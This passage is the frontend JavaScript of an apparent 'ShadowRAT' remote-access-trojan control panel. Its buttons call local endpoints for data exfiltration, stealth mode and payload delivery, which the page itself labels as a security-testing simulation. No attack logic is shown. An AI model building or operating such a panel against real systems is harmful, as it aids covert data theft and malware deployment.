    if (bytes === 0) return '0 Bytes';
    const k = 1024;
    const sizes = ['Bytes', 'KB', 'MB', 'GB'];
    const i = Math.floor(Math.log(bytes) / Math.log(k));
    return parseFloat((bytes / Math.pow(k, i)).toFixed(2)) + ' ' + sizes[i];
}

function collectData(target) {
    fetch('/api/data_exfiltration', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ target: target })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            document.getElementById('data-collection-status').innerHTML = `<span class="text-success">Data collected: ${target}</span>`;
            logActivity(`Data collection: ${target} - ${Object.keys(data.data_collected).length} items`, 'info');
            
            // Show collected data in modal
            const modalHtml = `
                <div class="modal fade" id="dataModal" tabindex="-1">
                    <div class="modal-dialog modal-lg">
                        <div class="modal-content">
                            <div class="modal-header">
                                <h5 class="modal-title">Collected Data: ${target}</h5>
                                <button type="button" class="btn-close" data-bs-dismiss="modal"></button>
                            </div>
                            <div class="modal-body">
                                <pre class="bg-dark text-light p-3 rounded">${JSON.stringify(data.data_collected, null, 2)}</pre>
                            </div>
                        </div>
                    </div>
                </div>
            `;
            document.body.insertAdjacentHTML('beforeend', modalHtml);
            const modal = new bootstrap.Modal(document.getElementById('dataModal'));
            modal.show();
        } else {
            document.getElementById('data-collection-status').innerHTML = `<span class="text-danger">${data.error}</span>`;
            logActivity(`Data collection error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Data collection network error: ${error.message}`, 'error');
    });
}

function toggleStealth(action) {
    fetch('/api/stealth_mode', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ action: action })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            document.getElementById('stealth-status').innerHTML = `<span class="text-success">${data.message}</span>`;
            logActivity(`Stealth mode: ${data.message}`, action === 'enable' ? 'warning' : 'info');
        } else {
            document.getElementById('stealth-status').innerHTML = `<span class="text-danger">${data.error}</span>`;
            logActivity(`Stealth mode error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Stealth mode network error: ${error.message}`, 'error');
    });
}

function deployPayload(type) {
    fetch('/api/payload_delivery', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ type: type })
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            document.getElementById('payload-status').innerHTML = `<span class="text-success">Payload: ${type}</span>`;
            logActivity(`Payload deployment: ${type} (simulated)`, 'warning');
            
            // Show payload info
            const capabilities = Object.entries(data.payload_capabilities).map(([k, v]) => `${k}: ${v}`).join('\n');
            alert(`Payload Type: ${type}\n\nCapabilities:\n${capabilities}\n\nNote: This is a simulation for security testing`);
        } else {
            document.getElementById('payload-status').innerHTML = `<span class="text-danger">${data.error}</span>`;
            logActivity(`Payload deployment error: ${data.error}`, 'error');
        }
    })
    .catch(error => {
        logActivity(`Payload deployment error: ${error.message}`, 'error');
    });
}

// Initialize
document.addEventListener('DOMContentLoaded', function() {
    logActivity('ShadowRAT Persistence Module initialized', 'info');
    logActivity('Target system fully compromised - All subsystems operational', 'info');
    
    // Add blinking cursor effect
    const cursor = document.querySelector('.cursor');
    if (cursor) {
        setInterval(() => {
            cursor.style.opacity = cursor.style.opacity === '0' ? '1' : '0';
        }, 500);
    }
    
    // Add scanning text animation
    const scanningLines = document.querySelectorAll('.scanning-line');
    if (scanningLines.length > 0) {
        let currentLine = 0;
        setInterval(() => {
            scanningLines.forEach((line, index) => {
                if (index === currentLine) {
                    line.style.opacity = '1';
                } else {
                    line.style.opacity = '0.3';
                }
            });
            currentLine = (currentLine + 1) % scanningLines.length;
        }, 1500);
    }
});
</script>
{% endblock %}